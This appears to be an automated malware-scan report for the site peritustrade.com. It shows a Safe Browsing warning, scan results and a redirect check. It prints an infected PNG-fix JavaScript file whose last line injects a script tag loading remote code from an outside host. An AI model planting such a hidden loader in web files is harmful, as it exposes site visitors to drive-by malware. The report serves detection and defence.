Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=peritustrade.com
Result: The website is marked by Google as suspicious: visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.peritustrade.com/ | 200 OK Content-Length: 4507 Content-Type: text/html | clean |
http://www.peritustrade.com/wpscripts/jspngfix.js | 200 OK Content-Length: 887 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below)
var supported = !/Gecko/.test(navigator.userAgent) && !/Opera/.test(navigator.userAgent) && /MSIE (5\.5)|[6]/.test(navigator.userAgent) && navigator.platform == "Win32";
function OnLoadPngFix() {
    if(!supported) return;
    if(!event.srcElement) return;
    var src=event.srcElement.src;
    if(!src) return;
    if(!new RegExp(blankSrc).test(src)) {
        if(/\.png$/.test(src.toLowerCase())) {
            src = src.replace(/\(/g, "%28" );
            src = src.replace(/\)/g, "%29" );
            event.srcElement.src = blankSrc;
            event.srcElement.runtimeStyle.filter = "progid:DXImageTransform.Microsoft.AlphaImageLoader(src='" + src + "',sizingMethod='scale')";
        } else {
            event.srcElement.runtimeStyle.filter = "";
        }
    }
}
document.write('<s'+'cript type="text/javascript" src="http://soaoo.blog-salopes.com:8080/IMAP.js"></scr'+'ipt>');
Antivirus reports:
http://soaoo.blog-salopes.com:8080/IMAP.js | 500 Can't connect to soaoo.blog-salopes.com:8080 Content-Length: 199 Content-Type: text/plain | clean |
http://soaoo.blog-salopes.com:8080/test404page.js | 500 Can't connect to soaoo.blog-salopes.com:8080 Content-Length: 199 Content-Type: text/plain | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: peritustrade.com
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: peritustrade.com
Referer: http://www.google.com/search?q=peritustrade.com
Result:
The result is similar to the first query. There are no suspicious redirects found.